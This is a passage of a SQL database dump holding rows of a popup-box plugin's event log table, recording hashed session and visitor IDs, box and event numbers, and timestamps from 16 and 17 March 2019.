(70879, '08d70aae9438335128ea7a395c6b4459', '8e9a16956483f85e', 0, 2, 1, '2019-03-16 12:17:35'),
(70880, '4f0d63f06dd60dc8785706355367cbf5', 'c4c9002176fd8f74', 0, 2, 1, '2019-03-16 12:17:58'),
(70881, '08d70aae9438335128ea7a395c6b4459', '8e9a16956483f85e', 0, 2, 1, '2019-03-16 12:18:25'),
(70882, 'c50a4fa11b59ac2f927c1278d6d8df7c', '1624785298a8447a', 0, 2, 1, '2019-03-16 12:19:15'),
(70883, '08d70aae9438335128ea7a395c6b4459', '8e9a16956483f85e', 0, 2, 1, '2019-03-16 12:19:16'),
(70884, '08d70aae9438335128ea7a395c6b4459', '8e9a16956483f85e', 0, 2, 1, '2019-03-16 12:20:47'),
(70885, 'c50a4fa11b59ac2f927c1278d6d8df7c', '1624785298a8447a', 0, 2, 1, '2019-03-16 12:21:16'),
(70886, '08d70aae9438335128ea7a395c6b4459', '8e9a16956483f85e', 0, 2, 1, '2019-03-16 12:21:26'),
(70887, '2d4b65a63ff8fedebbd99cffad4b8511', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-16 12:21:35'),
(70888, '08d70aae9438335128ea7a395c6b4459', '8e9a16956483f85e', 0, 2, 1, '2019-03-16 12:21:50'),
(70889, 'd0d2c2af552d32ecf67497bec7983488', '7501b42c35accff7', 0, 2, 1, '2019-03-16 12:22:50'),
(70890, '7f7d787d9af35165fc4c03bb6d880a26', '93f30eaefda9d8c4', 0, 2, 1, '2019-03-16 12:23:00'),
(70891, '08d70aae9438335128ea7a395c6b4459', '8e9a16956483f85e', 0, 2, 1, '2019-03-16 12:23:06'),
(70892, '0d25c078470835ec2c36c42205e00770', '0bf16c319bd2f666', 0, 2, 1, '2019-03-16 12:23:29'),
(70893, '1e4ec5283614a3cf75657751a57cfdf2', '3bb647eaa40476a8', 0, 2, 1, '2019-03-16 12:23:30'),
(70894, '0d25c078470835ec2c36c42205e00770', '0bf16c319bd2f666', 0, 2, 1, '2019-03-16 12:23:43'),
(70895, '1e4ec5283614a3cf75657751a57cfdf2', '3bb647eaa40476a8', 0, 2, 1, '2019-03-16 12:23:51'),
(70896, '08d70aae9438335128ea7a395c6b4459', '8e9a16956483f85e', 0, 2, 1, '2019-03-16 12:23:56'),
(70897, '0d25c078470835ec2c36c42205e00770', '0bf16c319bd2f666', 0, 2, 1, '2019-03-16 12:24:05'),
(70898, '08d70aae9438335128ea7a395c6b4459', '8e9a16956483f85e', 0, 2, 1, '2019-03-16 12:24:05'),
(70899, '5b179f8ba70fbb58fad1433b095e0855', 'dabdd3b2f1fefb03', 0, 2, 1, '2019-03-16 12:24:24'),
(70900, '832101422a765b14fbaf3b9b7abfec87', 'b453f7c003bf64ff', 0, 2, 1, '2019-03-16 12:24:27'),
(70901, '08d70aae9438335128ea7a395c6b4459', '8e9a16956483f85e', 0, 2, 1, '2019-03-16 12:24:29'),
(70902, '421548a0b9d8b50e90509115d4d0a3a1', '44451e386b316e7c', 0, 2, 1, '2019-03-16 12:24:58'),
(70903, '2d4b65a63ff8fedebbd99cffad4b8511', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-16 12:25:00'),
(70904, '2d4b65a63ff8fedebbd99cffad4b8511', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-16 12:26:11'),
(70905, '2d4b65a63ff8fedebbd99cffad4b8511', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-16 12:27:04'),
(70906, '08d70aae9438335128ea7a395c6b4459', '8e9a16956483f85e', 0, 2, 1, '2019-03-16 12:27:25'),
(70907, '5f83727492fa025c3ba031f7247b4559', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-16 12:27:37'),
(70908, '2d4b65a63ff8fedebbd99cffad4b8511', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-16 12:27:47'),
(70909, '29c6ac15842be6961717b72cd38b9f00', 'ef0ca87bfaada93e', 0, 2, 1, '2019-03-16 12:28:20'),
(70910, 'c5cadfbe73ab06a0a1fed4eb0f5906b3', '06135eb3f859ee95', 0, 2, 1, '2019-03-16 12:28:34'),
(70911, 'a33b539e6a4c1d6d88c5572f0b0b8d79', 'bb75f1a554156e4b', 0, 2, 1, '2019-03-16 12:30:05'),
(70912, '4aeb412cf7853ad2e529f87f7fcfd860', '1624785298a8447a', 0, 2, 1, '2019-03-16 12:32:36'),
(70913, '730975c7b69894aeaf3856862af27dbe', '4a9dd640884e0ec0', 0, 2, 1, '2019-03-16 12:41:06'),
(70914, 'c5cadfbe73ab06a0a1fed4eb0f5906b3', '06135eb3f859ee95', 0, 2, 1, '2019-03-16 12:42:07'),
(70915, '618a2c18ffeacadaa54fdf3991f495fd', '7ffba4677245886f', 0, 2, 1, '2019-03-16 12:42:07'),
(70916, 'c030853329c317c5f778e0df79a1cf5c', '8ad007cf09224cd8', 0, 2, 1, '2019-03-16 12:42:34'),
(70917, '871036a56c9d1bfcb67e109487914278', '624d6937076d1188', 0, 2, 1, '2019-03-16 12:43:32'),
(70918, '291bbe7d703363a3281dff9178edb71c', 'd86d441339858efd', 0, 2, 1, '2019-03-16 12:43:35'),
(70919, '3a8662b88e95b2f4fbc778d4685a9a00', 'df27b9a2919a8206', 0, 2, 1, '2019-03-16 12:43:36'),
(70920, '08d70aae9438335128ea7a395c6b4459', '8e9a16956483f85e', 0, 2, 1, '2019-03-16 12:44:21'),
(70921, '291bbe7d703363a3281dff9178edb71c', 'd86d441339858efd', 0, 2, 1, '2019-03-16 12:44:50'),
(70922, '16f3fcfc6526c71ed109161a7924c37c', 'eb0df83514b09317', 0, 2, 1, '2019-03-16 12:44:54'),
(70923, '291bbe7d703363a3281dff9178edb71c', 'd86d441339858efd', 0, 2, 1, '2019-03-16 12:45:10'),
(70924, 'cee2175164e1ade42e853e46210b88d1', '553b9f0a18b97af8', 0, 2, 1, '2019-03-16 12:45:16'),
(70925, '16f3fcfc6526c71ed109161a7924c37c', 'eb0df83514b09317', 0, 2, 1, '2019-03-16 12:46:28'),
(70926, 'bf40dfb0ed9b0fc437acfb4e3ec02aea', 'a2400ad07ed14890', 0, 2, 1, '2019-03-16 12:48:52'),
(70927, '85cee3d15b9d887d7889219349d197c6', '7ffba4677245886f', 0, 2, 1, '2019-03-16 12:48:57'),
(70928, 'bf40dfb0ed9b0fc437acfb4e3ec02aea', 'a2400ad07ed14890', 0, 2, 1, '2019-03-16 12:49:57'),
(70929, '60cb48c6694fb8ceb2e9a98c8452a0b2', '546887b39507976e', 0, 2, 1, '2019-03-16 12:50:37'),
(70930, '60cb48c6694fb8ceb2e9a98c8452a0b2', '546887b39507976e', 0, 2, 1, '2019-03-16 12:51:18'),
(70931, 'a0362f17819b57793ed8bbe5b329dee3', '7ffba4677245886f', 0, 2, 1, '2019-03-16 12:52:08'),
(70932, '8c11e0633240bb6bd4a4482e2ce7a85e', 'f6269ce34ab6a362', 0, 2, 1, '2019-03-16 12:54:09'),
(70933, 'bf0d5d4cb61e70e7a9f03c883e63e46a', '22f43a16a511f701', 0, 2, 1, '2019-03-16 12:54:22'),
(70934, '8c11e0633240bb6bd4a4482e2ce7a85e', 'f6269ce34ab6a362', 0, 2, 1, '2019-03-16 12:54:34'),
(70935, 'b9ea3afdf772961203978e730d8b4ec2', '6092d6c1cb041b23', 0, 2, 1, '2019-03-16 12:54:44'),
(70936, '08d70aae9438335128ea7a395c6b4459', '8e9a16956483f85e', 0, 2, 1, '2019-03-16 12:54:48'),
(70937, '8c11e0633240bb6bd4a4482e2ce7a85e', 'f6269ce34ab6a362', 0, 2, 1, '2019-03-16 12:55:17'),
(70938, '923516f904f0ac05e3b860ca84657326', '0c1826963d256ce7', 0, 2, 1, '2019-03-16 12:55:25'),
(70939, '798eb0693eff3b1e1ec17998b9b36c52', '22f43a16a511f701', 0, 2, 1, '2019-03-16 12:55:26'),
(70940, 'b42d884aa419534722ae751067749ec5', '0c15192004d35e90', 0, 2, 1, '2019-03-16 12:55:26'),
(70941, '798eb0693eff3b1e1ec17998b9b36c52', '22f43a16a511f701', 0, 2, 1, '2019-03-16 12:55:50'),
(70942, '8777cad1c78cc907999b51f3e5914de1', '2ea7201b0e939b00', 0, 2, 1, '2019-03-16 12:56:51'),
(70943, 'b110f55b891cd37b09f992af5ea55fdc', '407198c79af506a8', 0, 2, 1, '2019-03-16 12:57:09'),
(70944, '5f83727492fa025c3ba031f7247b4559', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-16 13:01:57'),
(70945, '2831014d0fc42c57766a113926866cf8', 'da0989130d1f218b', 0, 2, 1, '2019-03-16 13:02:18'),
(70946, '997b9d8c64d89294a0e0195714b50ac9', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-16 13:02:31'),
(70947, '997b9d8c64d89294a0e0195714b50ac9', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-16 13:02:44'),
(70948, '5b179f8ba70fbb58fad1433b095e0855', 'dabdd3b2f1fefb03', 0, 2, 1, '2019-03-16 13:03:44'),
(70949, 'e9fc5206f74a6251528a47934f7123de', '6406b85f20c1c00e', 0, 2, 1, '2019-03-16 13:05:25'),
(70950, '291bbe7d703363a3281dff9178edb71c', 'd86d441339858efd', 0, 2, 1, '2019-03-16 13:05:57'),
(70951, 'cbed83b0b60a37bd6919add2f9806a98', '7ffba4677245886f', 0, 2, 1, '2019-03-16 13:07:23'),
(70952, 'e9fc5206f74a6251528a47934f7123de', '6406b85f20c1c00e', 0, 2, 1, '2019-03-16 13:07:32'),
(70953, '291bbe7d703363a3281dff9178edb71c', 'd86d441339858efd', 0, 2, 1, '2019-03-16 13:08:48'),
(70954, '08d70aae9438335128ea7a395c6b4459', '8e9a16956483f85e', 0, 2, 1, '2019-03-16 13:10:54'),
(70955, '5f83727492fa025c3ba031f7247b4559', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-16 13:13:40'),
(70956, '798eb0693eff3b1e1ec17998b9b36c52', '22f43a16a511f701', 0, 2, 1, '2019-03-16 13:18:00'),
(70957, '291bbe7d703363a3281dff9178edb71c', 'd86d441339858efd', 0, 2, 1, '2019-03-16 13:18:16'),
(70958, 'e9fc5206f74a6251528a47934f7123de', '6406b85f20c1c00e', 0, 2, 1, '2019-03-16 13:18:39'),
(70959, '29c6ac15842be6961717b72cd38b9f00', 'ef0ca87bfaada93e', 0, 2, 1, '2019-03-16 13:18:51'),
(70960, '103a7992750035933c2330d84af4c77e', '529ff5b93b7c1cb7', 0, 2, 1, '2019-03-16 13:19:54'),
(70961, '798eb0693eff3b1e1ec17998b9b36c52', '22f43a16a511f701', 0, 2, 1, '2019-03-16 13:21:59'),
(70962, 'e9fc5206f74a6251528a47934f7123de', '6406b85f20c1c00e', 0, 2, 1, '2019-03-16 13:22:32'),
(70963, 'f7616708ae8d6f75911208f4c267d19d', '7ffba4677245886f', 0, 2, 1, '2019-03-16 13:23:15'),
(70964, '798eb0693eff3b1e1ec17998b9b36c52', '22f43a16a511f701', 0, 2, 1, '2019-03-16 13:25:04'),
(70965, '4aeb412cf7853ad2e529f87f7fcfd860', '1624785298a8447a', 0, 2, 1, '2019-03-16 13:25:23'),
(70966, '798eb0693eff3b1e1ec17998b9b36c52', '22f43a16a511f701', 0, 2, 1, '2019-03-16 13:29:48'),
(70967, '5b179f8ba70fbb58fad1433b095e0855', 'dabdd3b2f1fefb03', 0, 2, 1, '2019-03-16 13:31:19'),
(70968, 'e9fc5206f74a6251528a47934f7123de', '6406b85f20c1c00e', 0, 2, 1, '2019-03-16 13:33:33'),
(70969, '3edeec8c781fd9911a145af6fe3a0041', '6befdcbc3c5586e5', 0, 2, 1, '2019-03-16 13:35:27'),
(70970, 'de2622af1a736045834b848fd7d9374b', '03424b4377b3f6e8', 0, 2, 1, '2019-03-16 13:36:16'),
(70971, '9b19e0cd01ecb6cf271a487ce0d67156', 'fbc9d7ace3bb8e8f', 0, 2, 1, '2019-03-16 13:38:13'),
(70972, 'e9fc5206f74a6251528a47934f7123de', '6406b85f20c1c00e', 0, 2, 1, '2019-03-16 13:38:25'),
(70973, 'bb8c422a763b46e730a07f858badf9d7', 'f55f6ac8da4fc49c', 0, 2, 1, '2019-03-16 13:39:53'),
(70974, '7daff181ad057de0d9651dccdd775e9d', '0530018377078939', 0, 2, 1, '2019-03-16 13:45:20'),
(70975, '7daff181ad057de0d9651dccdd775e9d', '0530018377078939', 0, 2, 1, '2019-03-16 13:45:22'),
(70976, '997b9d8c64d89294a0e0195714b50ac9', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-16 13:45:37'),
(70977, 'd94135b099793edd1170a342a2e776af', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-16 13:52:48'),
(70978, 'd94135b099793edd1170a342a2e776af', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-16 13:53:02'),
(70979, '5878c15551f9b4fa578e537200c1d8fd', 'f8d002c7b8b76490', 0, 2, 1, '2019-03-16 13:53:52'),
(70980, '5878c15551f9b4fa578e537200c1d8fd', 'f8d002c7b8b76490', 0, 2, 1, '2019-03-16 13:54:33'),
(70981, 'e9fc5206f74a6251528a47934f7123de', '6406b85f20c1c00e', 0, 2, 1, '2019-03-16 14:04:45'),
(70982, '2d4b65a63ff8fedebbd99cffad4b8511', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-16 14:08:44'),
(70983, '7d33030df7938809523da1302ac15140', 'ac7a40dcd48698a1', 0, 2, 1, '2019-03-16 14:15:31'),
(70984, '7d33030df7938809523da1302ac15140', 'ac7a40dcd48698a1', 0, 2, 1, '2019-03-16 14:15:59'),
(70985, 'f7616708ae8d6f75911208f4c267d19d', '7ffba4677245886f', 0, 2, 1, '2019-03-16 14:18:32'),
(70986, 'e9fc5206f74a6251528a47934f7123de', '6406b85f20c1c00e', 0, 2, 1, '2019-03-16 14:20:45'),
(70987, 'aa9fa61a09222f2b621738a3df4178c2', '2fd68b1702c7daec', 0, 2, 1, '2019-03-16 14:22:25'),
(70988, 'c647eadc1d6f31a96c535fa9df0eee18', '4f8f2dbd3b012e31', 0, 2, 1, '2019-03-16 14:23:10'),
(70989, 'e4faa5040f2c223ddce992bf0cd6beb7', '6a01a7643219afab', 0, 2, 1, '2019-03-16 14:23:17'),
(70990, 'abff203b1eea972c260d3d47f47773e1', 'bb75f1a554156e4b', 0, 2, 1, '2019-03-16 14:23:36'),
(70991, 'c647eadc1d6f31a96c535fa9df0eee18', '4f8f2dbd3b012e31', 0, 2, 1, '2019-03-16 14:25:37'),
(70992, '235bc301d4c8c5f6bdad887e70f929b4', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-16 14:30:32'),
(70993, '4ad28e79c075699ad89ad1a05b705d7d', 'ec298f16abca1ffa', 0, 2, 1, '2019-03-16 14:32:30'),
(70994, '4ad28e79c075699ad89ad1a05b705d7d', 'ec298f16abca1ffa', 0, 2, 1, '2019-03-16 14:33:03'),
(70995, 'aa9fa61a09222f2b621738a3df4178c2', '2fd68b1702c7daec', 0, 2, 1, '2019-03-16 14:43:57'),
(70996, '4ad28e79c075699ad89ad1a05b705d7d', 'ec298f16abca1ffa', 0, 2, 1, '2019-03-16 14:44:31'),
(70997, '5b179f8ba70fbb58fad1433b095e0855', 'dabdd3b2f1fefb03', 0, 2, 1, '2019-03-16 14:46:26'),
(70998, '871036a56c9d1bfcb67e109487914278', '624d6937076d1188', 0, 2, 1, '2019-03-16 14:48:29'),
(70999, '291bbe7d703363a3281dff9178edb71c', 'd86d441339858efd', 0, 2, 1, '2019-03-16 14:51:10'),
(71000, '291bbe7d703363a3281dff9178edb71c', 'd86d441339858efd', 0, 2, 1, '2019-03-16 14:52:14'),
(71001, 'e15f903f1f0d79bb14c43584da9e50d3', 'b53c70bea01d2d6e', 0, 2, 1, '2019-03-16 14:56:09'),
(71002, '4ad28e79c075699ad89ad1a05b705d7d', 'ec298f16abca1ffa', 0, 2, 1, '2019-03-16 14:58:21'),
(71003, '4ad28e79c075699ad89ad1a05b705d7d', 'ec298f16abca1ffa', 0, 2, 1, '2019-03-16 14:59:22'),
(71004, '4ad28e79c075699ad89ad1a05b705d7d', 'ec298f16abca1ffa', 0, 2, 1, '2019-03-16 15:00:16'),
(71005, '7ea8a42ddc37109ee14ba5ae19ed4d30', 'f85fff0c11466018', 0, 2, 1, '2019-03-16 15:00:18'),
(71006, '2d4b65a63ff8fedebbd99cffad4b8511', 'c5b9fd5b72abf8c4', 0, 2, 1, '2019-03-16 15:11:37'),
(71007, 'f79ac247f18d9f7666befdb55aea978b', '402692e46d0378b1', 0, 2, 1, '2019-03-16 15:14:54'),
(71008, '845bcb1c6b6bcf9d88ee3dae2766ae65', '27d3b62cdd82d36e', 0, 2, 1, '2019-03-16 15:16:14'),
(71009, 'd9939e0876b0f541a4ea69fb48d5e721', '52bd60de86b2fc5e', 0, 2, 1, '2019-03-16 15:17:18'),
(71010, 'd94135b099793edd1170a342a2e776af', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-16 15:17:59'),
(71011, '95dce4cfaf34a36a79cd6c4d48b22264', 'c9f9bf7e23859bf9', 0, 2, 1, '2019-03-16 15:24:36'),
(71012, '95dce4cfaf34a36a79cd6c4d48b22264', 'c9f9bf7e23859bf9', 0, 2, 1, '2019-03-16 15:24:55'),
(71013, 'a07dee9c7a2b6a87486452052e13fbce', '93f30eaefda9d8c4', 0, 2, 1, '2019-03-16 15:25:14'),
(71014, '95dce4cfaf34a36a79cd6c4d48b22264', 'c9f9bf7e23859bf9', 0, 2, 1, '2019-03-16 15:26:25'),
(71015, '535f36859d6437df924d73012ac4b069', '3254a3a7f46fad86', 0, 2, 1, '2019-03-16 15:27:47'),
(71016, '535f36859d6437df924d73012ac4b069', '3254a3a7f46fad86', 0, 2, 1, '2019-03-16 15:28:24'),
(71017, '535f36859d6437df924d73012ac4b069', '3254a3a7f46fad86', 0, 2, 1, '2019-03-16 15:28:40'),
(71018, '535f36859d6437df924d73012ac4b069', '3254a3a7f46fad86', 0, 2, 1, '2019-03-16 15:29:06'),
(71019, '276ca406dd7c2aab012b6b97faf88692', 'f35dbfd1f37a720c', 0, 2, 1, '2019-03-16 15:47:11'),
(71020, '6bc777c9341bf5db35a865e114571568', '0d6d214e577e9800', 0, 2, 1, '2019-03-16 15:48:08'),
(71021, 'f7c303ce37e09409fca72ac8579469b7', 'bb06bc6e16b6a5ef', 0, 2, 1, '2019-03-16 15:52:39'),
(71022, '4cbc1dcfca819b4bc8c5b06a29b9ad34', '84c61950074746b4', 0, 2, 1, '2019-03-16 16:35:46'),
(71023, '73d69c2e994723fef4c07d36eb22bf20', '653eedbff215b5c1', 0, 2, 1, '2019-03-16 17:10:04'),
(71024, '73d69c2e994723fef4c07d36eb22bf20', '653eedbff215b5c1', 0, 2, 1, '2019-03-16 17:10:12'),
(71025, '73d69c2e994723fef4c07d36eb22bf20', '653eedbff215b5c1', 0, 2, 1, '2019-03-16 17:10:59'),
(71026, '73d69c2e994723fef4c07d36eb22bf20', '653eedbff215b5c1', 0, 2, 1, '2019-03-16 17:11:11'),
(71027, '35cdc84539adaf9ecdca77f61a9f1073', 'f136d95bbd02732a', 0, 2, 1, '2019-03-16 17:45:30'),
(71028, '35cdc84539adaf9ecdca77f61a9f1073', 'f136d95bbd02732a', 0, 2, 1, '2019-03-16 17:45:50'),
(71029, '1834eca10e75a2c9fc8c1a26201076c2', '0611035341fa8332', 0, 2, 1, '2019-03-16 17:47:41'),
(71030, 'c04ecd5b4e815a6e2d9197d53965450b', 'e30d172cfc35fe70', 0, 2, 1, '2019-03-16 17:51:38'),
(71031, '42b49adcbfa6a86a1b880facdd983e43', 'c816d9a685db1d97', 0, 2, 1, '2019-03-16 17:51:38'),
(71032, '42b49adcbfa6a86a1b880facdd983e43', 'c816d9a685db1d97', 0, 2, 1, '2019-03-16 17:52:15'),
(71033, '42b49adcbfa6a86a1b880facdd983e43', 'c816d9a685db1d97', 0, 2, 1, '2019-03-16 17:53:51'),
(71034, '42b49adcbfa6a86a1b880facdd983e43', 'c816d9a685db1d97', 0, 2, 1, '2019-03-16 17:54:22'),
(71035, '42b49adcbfa6a86a1b880facdd983e43', 'c816d9a685db1d97', 0, 2, 1, '2019-03-16 17:54:38'),
(71036, '42b49adcbfa6a86a1b880facdd983e43', 'c816d9a685db1d97', 0, 2, 1, '2019-03-16 17:55:06'),
(71037, '42b49adcbfa6a86a1b880facdd983e43', 'c816d9a685db1d97', 0, 2, 1, '2019-03-16 17:56:00'),
(71038, '42b49adcbfa6a86a1b880facdd983e43', 'c816d9a685db1d97', 0, 2, 1, '2019-03-16 17:56:34'),
(71039, '42b49adcbfa6a86a1b880facdd983e43', 'c816d9a685db1d97', 0, 2, 1, '2019-03-16 18:05:41'),
(71040, 'cb77b1e68369e15259c494e1556f4828', '8287314b3ed4f0a5', 0, 2, 1, '2019-03-16 18:10:09'),
(71041, 'cb77b1e68369e15259c494e1556f4828', '8287314b3ed4f0a5', 0, 2, 1, '2019-03-16 18:16:43'),
(71042, '9c62868b6cbe8adf71a2b095fe4a47ab', '2ea7201b0e939b00', 0, 2, 1, '2019-03-16 18:41:22'),
(71043, '9c62868b6cbe8adf71a2b095fe4a47ab', '2ea7201b0e939b00', 0, 2, 1, '2019-03-16 18:41:45'),
(71044, '33736e6e347eb7edc718d69d570cd424', '0315a9e8bb354f60', 0, 2, 1, '2019-03-16 18:44:02'),
(71045, '3b825f982a662032d12a808bbc28a74d', 'c25394c4a195519e', 0, 2, 1, '2019-03-16 18:50:06'),
(71046, '96c9425d0fb283b8cace45e887e8423c', 'fbee333fd8b9ea36', 0, 2, 1, '2019-03-16 18:50:46'),
(71047, 'a8e59481cf984dd31b5914a95f25c573', '427170a62732ebcc', 0, 2, 1, '2019-03-16 18:51:23'),
(71048, 'a8e59481cf984dd31b5914a95f25c573', '427170a62732ebcc', 0, 2, 1, '2019-03-16 18:51:29'),
(71049, 'a8e59481cf984dd31b5914a95f25c573', '427170a62732ebcc', 0, 2, 1, '2019-03-16 18:53:34'),
(71050, '3b797f8747567fdf3208be6c7223e518', '60fe507c41e14ac3', 0, 2, 1, '2019-03-16 19:00:39'),
(71051, 'ae9b28e0d87d06a80d1803249acf4a03', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-16 19:01:22'),
(71052, 'ae9b28e0d87d06a80d1803249acf4a03', 'a30c08bfcb146c2b', 0, 2, 1, '2019-03-16 19:06:31'),
(71053, 'b83a01382a73583c952a5c16bbf78e86', '767582d40f21110f', 0, 2, 1, '2019-03-16 19:24:43'),
(71054, 'f4c16be480f68031a3219445e236d677', '65bae380b109f550', 0, 2, 1, '2019-03-16 19:43:58'),
(71055, '3cefca11785ace969a403acc2c4e8fc6', '5325ae4c4664b4e2', 0, 2, 1, '2019-03-16 20:20:52'),
(71056, '1d74967290ab940b2bb22816d8026bd8', '023a2021c8d62bb4', 0, 2, 1, '2019-03-16 20:22:07'),
(71057, 'e9fc5206f74a6251528a47934f7123de', '6406b85f20c1c00e', 0, 2, 1, '2019-03-16 20:53:12'),
(71058, '9b8412a5b6989a37cc209a8b57decf0a', 'b60398047d400965', 0, 2, 1, '2019-03-16 21:30:46'),
(71059, 'bc8f61b4624c6c3b821e391bff404770', 'efd90449010ff68b', 0, 2, 1, '2019-03-16 21:43:00'),
(71060, 'bdcda794817c555af5ea21c3eef5ec26', 'd982869195a81c84', 0, 2, 1, '2019-03-16 22:15:03'),
(71061, 'beb960bef93c19b2239d6b2c148b5ca8', '4681324a8212f9d6', 0, 2, 1, '2019-03-16 22:17:36'),
(71062, 'e9fc5206f74a6251528a47934f7123de', '6406b85f20c1c00e', 0, 2, 1, '2019-03-16 22:48:01'),
(71063, '9529000a55d7774e34c244f62b998635', '7a390118e2263ed5', 0, 2, 1, '2019-03-16 22:50:09'),
(71064, 'f70e42e8278ae92a6a18f823b4e4d44c', 'c25394c4a195519e', 0, 2, 1, '2019-03-16 23:07:18'),
(71065, 'fc4771210268220d09d0b27a88abc809', 'd29bdd6273af9de5', 0, 2, 1, '2019-03-16 23:25:45'),
(71066, '1428a150c7d1209acfecc64054b70fb9', '8d0ce8d2f494ec99', 0, 2, 1, '2019-03-17 00:36:55'),
(71067, '02ebad862c7e67e7f91e1f38c8bfcfb4', '3e08dc25654e7585', 0, 2, 1, '2019-03-17 00:39:44'),
(71068, '36bc49d3803014e237705513a4561bde', '92072389c472e36e', 0, 2, 1, '2019-03-17 00:41:48'),
(71069, '36bc49d3803014e237705513a4561bde', '92072389c472e36e', 0, 2, 1, '2019-03-17 00:42:27'),
(71070, '36bc49d3803014e237705513a4561bde', '92072389c472e36e', 0, 2, 1, '2019-03-17 00:42:48'),
(71071, '36bc49d3803014e237705513a4561bde', '92072389c472e36e', 0, 2, 1, '2019-03-17 00:43:00'),
(71072, '36bc49d3803014e237705513a4561bde', '92072389c472e36e', 0, 2, 1, '2019-03-17 00:45:15'),
(71073, '316ed97d8eeaadd04000151e3e7ed4de', 'fdb91fdd4c71c9bc', 0, 2, 1, '2019-03-17 01:11:01'),
(71074, '4141467c4d700a50cc060e2a3a6da492', '4a9dd640884e0ec0', 0, 2, 1, '2019-03-17 01:16:16'),
(71075, '18769a2f234adc66a7d934d16052f783', '5942dacbd1fd87f9', 0, 2, 1, '2019-03-17 01:16:46'),
(71076, '913c7bad9dc3c193b8c2f62c6f4ff197', '9974073681d6979b', 0, 2, 1, '2019-03-17 01:31:47'),
(71077, '2791ea407c238d447b875bf6cde2c958', 'e3413f2163c4f64a', 0, 2, 1, '2019-03-17 01:40:45'),
(71078, '9f6f95203d45cbf69e833db7d2ebc677', 'af06ebe7644a0c83', 0, 2, 1, '2019-03-17 02:58:13'),
(71079, '4147077bac92e5a2d8f1ba5e7c6e1440', '1d144db1407bc7f3', 0, 2, 1, '2019-03-17 03:23:22'),
(71080, '15e28ae89ac6fb6607316085858af110', 'baa8d16c1a4e5230', 0, 2, 1, '2019-03-17 04:18:37'),
(71081, '15e28ae89ac6fb6607316085858af110', 'baa8d16c1a4e5230', 0, 2, 1, '2019-03-17 04:18:50'),
(71082, '15e28ae89ac6fb6607316085858af110', 'baa8d16c1a4e5230', 0, 2, 1, '2019-03-17 04:19:17'),
(71083, 'e9eff80d52a560f1ee03686bef271595', '4c5e40b1232e8bef', 0, 2, 1, '2019-03-17 04:23:24'),
(71084, 'afa54db015e3801d7641ba7e33b66791', '267638c83cee8f17', 0, 2, 1, '2019-03-17 04:41:13'),
(71085, 'afa54db015e3801d7641ba7e33b66791', '267638c83cee8f17', 0, 2, 1, '2019-03-17 04:41:26'),
(71086, 'ab94c28a1c9857b53fd814faa3b9b39a', '10e3322b01ac9fcc', 0, 2, 1, '2019-03-17 04:46:02'),
(71087, 'e0651e3cb94a87e14a3622d8b22eb6b3', '2515e33682073d44', 0, 2, 1, '2019-03-17 04:46:44'),
(71088, 'e0651e3cb94a87e14a3622d8b22eb6b3', '2515e33682073d44', 0, 2, 1, '2019-03-17 04:46:47'),
(71089, '2791ea407c238d447b875bf6cde2c958', 'e3413f2163c4f64a', 0, 2, 1, '2019-03-17 04:48:31'),
(71090, 'e0651e3cb94a87e14a3622d8b22eb6b3', '2515e33682073d44', 0, 2, 1, '2019-03-17 04:48:37'),
(71091, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 04:50:36'),
(71092, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 04:51:19'),
(71093, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 04:52:06'),
(71094, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 04:52:56'),
(71095, 'c218e3148b086dfd5a179e928abc8032', '3110fe83e55b4eea', 0, 2, 1, '2019-03-17 04:53:20'),
(71096, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 04:53:43'),
(71097, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 04:54:24'),
(71098, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 04:55:23'),
(71099, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 04:55:55'),
(71100, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 04:56:29'),
(71101, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 04:59:15'),
(71102, '37067a27d1fe104af3f1b3dbaa146549', 'e86c7e938b6e8def', 0, 2, 1, '2019-03-17 04:59:32');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(71103, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 04:59:49'),
(71104, '1a4c73bb6b3bd8c6b2749594b1c89667', '7cb2227c839661ee', 0, 2, 1, '2019-03-17 05:00:31'),
(71105, '4ad596feba3c8fd398b78c63c06d6d59', '7ffba4677245886f', 0, 2, 1, '2019-03-17 05:00:58'),
(71106, '1a4c73bb6b3bd8c6b2749594b1c89667', '7cb2227c839661ee', 0, 2, 1, '2019-03-17 05:01:14'),
(71107, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 05:01:16'),
(71108, '9c6884a37a94e081f16a0e7a72588acc', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-17 05:02:09'),
